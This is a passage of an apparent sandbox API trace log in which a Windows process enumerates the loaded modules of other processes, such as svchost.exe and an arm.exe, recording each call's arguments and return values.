GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff760000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0076.721] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb9a0000, lpmodinfo=0x25584b0, cb=0x18 | out: lpmodinfo=0x25584b0*(lpBaseOfDll=0x7fefb9a0000, SizeOfImage=0x15000, EntryPoint=0x7fefb9a1050)) returned 1 [0076.723] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb9a0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wkscli.dll") returned 0xa [0076.725] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb9a0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")) returned 0x1e [0076.727] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd180000, lpmodinfo=0x255a670, cb=0x18 | out: lpmodinfo=0x255a670*(lpBaseOfDll=0x7fefd180000, SizeOfImage=0x32000, EntryPoint=0x7fefd18144c)) returned 1 [0076.729] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd180000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="netjoin.dll") returned 0xb [0076.731] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd180000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")) returned 0x1f [0076.732] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb9c0000, lpmodinfo=0x255c830, cb=0x18 | out: lpmodinfo=0x255c830*(lpBaseOfDll=0x7fefb9c0000, SizeOfImage=0xc000, EntryPoint=0x7fefb9c18a4)) returned 1 [0076.734] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb9c0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="netutils.dll") returned 0xc [0076.736] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb9c0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")) returned 0x20 [0076.738] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd640000, lpmodinfo=0x255ea00, cb=0x18 | out: lpmodinfo=0x255ea00*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0076.740] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd640000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0076.742] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd640000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0076.744] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb320000, lpmodinfo=0x2560bc0, cb=0x18 | out: lpmodinfo=0x2560bc0*(lpBaseOfDll=0x7fefb320000, SizeOfImage=0xb000, EntryPoint=0x7fefb324f8c)) returned 1 [0076.746] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb320000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="slc.dll") returned 0x7 [0076.748] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb320000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")) returned 0x1b [0076.750] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb160000, lpmodinfo=0x2562d70, cb=0x18 | out: lpmodinfo=0x2562d70*(lpBaseOfDll=0x7fefb160000, SizeOfImage=0x18000, EntryPoint=0x7fefb161010)) returned 1 [0076.752] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb160000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="MPR.dll") returned 0x7 [0076.754] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb160000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MPR.dll" (normalized: "c:\\windows\\system32\\mpr.dll")) returned 0x1b [0076.757] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb150000, lpmodinfo=0x2564f20, cb=0x18 | out: lpmodinfo=0x2564f20*(lpBaseOfDll=0x7fefb150000, SizeOfImage=0xa000, EntryPoint=0x7fefb151198)) returned 1 [0076.759] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb150000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="drprov.dll") returned 0xa [0076.761] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb150000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll")) returned 0x1e [0076.763] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb120000, lpmodinfo=0x25670e0, cb=0x18 | out: lpmodinfo=0x25670e0*(lpBaseOfDll=0x7fefb120000, SizeOfImage=0x22000, EntryPoint=0x7fefb121198)) returned 1 [0076.765] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb120000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ntlanman.dll") returned 0xc [0076.767] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb120000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll")) returned 0x20 [0076.770] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb100000, lpmodinfo=0x25692b0, cb=0x18 | out: lpmodinfo=0x25692b0*(lpBaseOfDll=0x7fefb100000, SizeOfImage=0x1c000, EntryPoint=0x7fefb101198)) returned 1 [0076.774] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb100000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="davclnt.dll") returned 0xb [0076.776] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb100000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll")) returned 0x1f [0076.778] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb0f0000, lpmodinfo=0x256b688, cb=0x18 | out: lpmodinfo=0x256b688*(lpBaseOfDll=0x7fefb0f0000, SizeOfImage=0xa000, EntryPoint=0x7fefb0f4938)) returned 1 [0076.781] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb0f0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="DAVHLPR.dll") returned 0xb [0076.783] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb0f0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\DAVHLPR.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll")) returned 0x1f [0076.786] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb0e0000, lpmodinfo=0x256d848, cb=0x18 | out: lpmodinfo=0x256d848*(lpBaseOfDll=0x7fefb0e0000, SizeOfImage=0xf000, EntryPoint=0x7fefb0e1040)) returned 1 [0076.788] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb0e0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="cscapi.dll") returned 0xa [0076.791] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb0e0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")) returned 0x1e [0076.794] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x95c) returned 0x218 [0076.794] EnumProcessModules (in: hProcess=0x218, lphModule=0x2570968, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2570968, lpcbNeeded=0x23ee40) returned 1 [0076.794] GetModuleInformation (in: hProcess=0x218, hModule=0xcf0000, lpmodinfo=0x2570bd8, cb=0x18 | out: lpmodinfo=0x2570bd8*(lpBaseOfDll=0xcf0000, SizeOfImage=0x17000, EntryPoint=0xcf14a1)) returned 1 [0076.794] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xcf0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="arm.exe") returned 0x7 [0076.795] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xcf0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\WindowsPowerShell\\arm.exe" (normalized: "c:\\program files (x86)\\windowspowershell\\arm.exe")) returned 0x30 [0076.795] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2572df0, cb=0x18 | out: lpmodinfo=0x2572df0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0076.795] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0076.796] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0076.796] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2574fb0, cb=0x18 | out: lpmodinfo=0x2574fb0*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0076.797] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0076.797] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0076.797] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2577170, cb=0x18 | out: lpmodinfo=0x2577170*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0076.798] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0076.798] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0076.799] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2579340, cb=0x18 | out: lpmodinfo=0x2579340*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0076.799] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0076.800] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0076.801] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x254) returned 0x218 [0076.801] EnumProcessModules (in: hProcess=0x218, lphModule=0x257ba78, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x257ba78, lpcbNeeded=0x23ee40) returned 1 [0076.805] GetModuleInformation (in: hProcess=0x218, hModule=0xff760000, lpmodinfo=0x257bce8, cb=0x18 | out: lpmodinfo=0x257bce8*(lpBaseOfDll=0xff760000, SizeOfImage=0xb000, EntryPoint=0xff76246c)) returned 1 [0076.805] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xff760000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="svchost.exe") returned 0xb [0076.806] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xff760000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0076.806] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x257dee0, cb=0x18 | out: lpmodinfo=0x257dee0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0076.806] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0076.807] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0076.807] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x25800a0, cb=0x18 | out: lpmodinfo=0x25800a0*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0076.808] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0076.808] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0076.809] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x2582270, cb=0x18 | out: lpmodinfo=0x2582270*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0076.809] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0076.810] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0076.810] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff100000, lpmodinfo=0x2584440, cb=0x18 | out: lpmodinfo=0x2584440*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0076.811] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff100000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0076.811] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff100000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0076.812] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x2586658, cb=0x18 | out: lpmodinfo=0x2586658*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0076.812] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0076.813] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0076.814] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x2588818, cb=0x18 | out: lpmodinfo=0x2588818*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0076.814] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0076.815] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0076.816] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb80000, lpmodinfo=0x258a9d8, cb=0x18 | out: lpmodinfo=0x258a9d8*(lpBaseOfDll=0x7fefcb80000, SizeOfImage=0x67000, EntryPoint=0x7fefcb8d320)) returned 1 [0076.816] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb80000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="umpnpmgr.dll") returned 0xc [0076.818] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb80000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\umpnpmgr.dll" (normalized: "c:\\windows\\system32\\umpnpmgr.dll")) returned 0x20 [0076.819] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb60000, lpmodinfo=0x258cba8, cb=0x18 | out: lpmodinfo=0x258cba8*(lpBaseOfDll=0x7fefcb60000, SizeOfImage=0x1f000, EntryPoint=0x7fefcb65c68)) returned 1 [0076.820] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb60000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="SPINF.dll") returned 0x9 [0076.820] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb60000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\SPINF.dll" (normalized: "c:\\windows\\system32\\spinf.dll")) returned 0x1d [0076.821] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x258ee00, cb=0x18 | out: lpmodinfo=0x258ee00*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0076.822] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0076.823] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0076.824] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x2590fc0, cb=0x18 | out: lpmodinfo=0x2590fc0*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0076.825] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0076.826] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0076.826] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x2593180, cb=0x18 | out: lpmodinfo=0x2593180*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0076.827] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0076.828] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0076.829] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x2595330, cb=0x18 | out: lpmodinfo=0x2595330*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0076.830] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0076.831] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0076.833] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb40000, lpmodinfo=0x25974f0, cb=0x18 | out: lpmodinfo=0x25974f0*(lpBaseOfDll=0x7fefcb40000, SizeOfImage=0x12000, EntryPoint=0x7fefcb41060)) returned 1 [0076.834] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb40000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="DEVRTL.dll") returned 0xa [0076.835] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb40000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\DEVRTL.dll" (normalized: "c:\\windows\\system32\\devrtl.dll")) returned 0x1e [0076.836] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff400000, lpmodinfo=0x25996b0, cb=0x18 | out: lpmodinfo=0x25996b0*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0076.837] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff400000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0076.838] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff400000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0076.839] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9d0000, lpmodinfo=0x259b870, cb=0x18 | out: lpmodinfo=0x259b870*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0076.840] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9d0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0076.842] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9d0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0076.843] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd760000, lpmodinfo=0x259da48, cb=0x18 | out: lpmodinfo=0x259da48*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0076.844] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd760000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0076.845] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd760000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0076.847] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb20000, lpmodinfo=0x259fd30, cb=0x18 | out: lpmodinfo=0x259fd30*(lpBaseOfDll=0x7fefcb20000, SizeOfImage=0x1e000, EntryPoint=0x7fefcb213b8)) returned 1 [0076.849] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb20000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="USERENV.dll") returned 0xb [0076.851] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb20000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USERENV.dll" (normalized: "c:\\windows\\system32\\userenv.dll")) returned 0x1f [0076.852] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd780000, lpmodinfo=0x25a1ef0, cb=0x18 | out: lpmodinfo=0x25a1ef0*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0076.854] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd780000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0076.855] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd780000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0076.857] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcb00000, lpmodinfo=0x25a40b0, cb=0x18 | out: lpmodinfo=0x25a40b0*(lpBaseOfDll=0x7fefcb00000, SizeOfImage=0x1b000, EntryPoint=0x7fefcb02068)) returned 1 [0076.858] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcb00000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="GPAPI.dll") returned 0x9 [0076.859] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcb00000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GPAPI.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")) returned 0x1d [0076.861] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x25a6270, cb=0x18 | out: lpmodinfo=0x25a6270*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0076.862] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0076.865] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0076.867] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcad0000, lpmodinfo=0x25a8440, cb=0x18 | out: lpmodinfo=0x25a8440*(lpBaseOfDll=0x7fefcad0000, SizeOfImage=0x2c000, EntryPoint=0x7fefcad1860)) returned 1 [0076.868] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcad0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="umpo.dll") returned 0x8 [0076.870] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcad0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll")) returned 0x1c [0076.871] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd720000, lpmodinfo=0x25aa600, cb=0x18 | out: lpmodinfo=0x25aa600*(lpBaseOfDll=0x7fefd720000, SizeOfImage=0x3d000, EntryPoint=0x7fefd7218f4)) returned 1 [0076.873] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd720000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="WINSTA.dll") returned 0xa [0076.874] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd720000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\WINSTA.dll" (normalized: "c:\\windows\\system32\\winsta.dll")) returned 0x1e [0076.876] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdc80000, lpmodinfo=0x25ac7c0, cb=0x18 | out: lpmodinfo=0x25ac7c0*(lpBaseOfDll=0x7fefdc80000, SizeOfImage=0x1d7000, EntryPoint=0x7fefdc81010)) returned 1 [0076.878] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdc80000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="SETUPAPI.dll") returned 0xc [0076.879] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdc80000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SETUPAPI.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")) returned 0x20 [0076.881] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9a0000, lpmodinfo=0x25ae990, cb=0x18 | out: lpmodinfo=0x25ae990*(lpBaseOfDll=0x7fefd9a0000, SizeOfImage=0x36000, EntryPoint=0x7fefd9a1474)) returned 1 [0076.883] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9a0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="CFGMGR32.dll") returned 0xc [0076.885] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9a0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CFGMGR32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0076.886] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x25b0b60, cb=0x18 | out: lpmodinfo=0x25b0b60*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0076.888] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, 